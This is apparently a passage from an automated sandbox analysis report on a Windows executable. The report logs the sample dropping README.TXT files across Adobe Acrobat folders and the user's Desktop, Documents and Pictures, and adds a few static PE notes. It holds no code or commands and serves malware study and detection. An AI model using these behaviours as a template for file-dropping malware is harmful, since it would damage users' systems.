Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sign-services-auth\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\signatures\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\task-handler\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\tracked-send\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\uss-search\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\themes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\themes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\cef\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\libs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\cef\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\libs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\cef\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\libs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\dark\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\2.1.15\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\img\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\assets\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\css\README.TXTJump to behavior
Source: win_gui.exe.exe, Static file information: File size 1753088 > 1048576
Source: win_gui.exe.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: win_gui.exe.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005CA0B9 LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetCurrentProcess, GetProcessId, GetEnvironmentVariableW, FreeLibrary, 0_2_005CA0B9
Source: win_gui.exe.exe, Static PE information: real checksum: 0x1223c5 should be: 0x1ae5b6
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005D27D0 push ecx; ret 0_2_005D27E3

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\win7\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\win8\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\BJZFPPWAPT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\EFOYFBOLXA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\EOWRVPQCCS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\GRXZDKKVDB\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\HMPPSXQPQV\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\JDDHMPCDUJ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\LHEPQPGEWF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\NVWZAPQSQL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\NYMMPCEIMA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\QFAPOWPAFG\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\UNKRLCVOHV\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\ZGGKNSUKOP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\BJZFPPWAPT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\EFOYFBOLXA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\EOWRVPQCCS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\GRXZDKKVDB\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\HMPPSXQPQV\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\JDDHMPCDUJ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\LHEPQPGEWF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\NVWZAPQSQL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\NYMMPCEIMA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\QFAPOWPAFG\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\UNKRLCVOHV\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\ZGGKNSUKOP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Favorites\Links\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Pictures\Camera Roll\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Pictures\Saved Pictures\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\CMap\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\SaslPrep\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\README.TXTJump to behavior
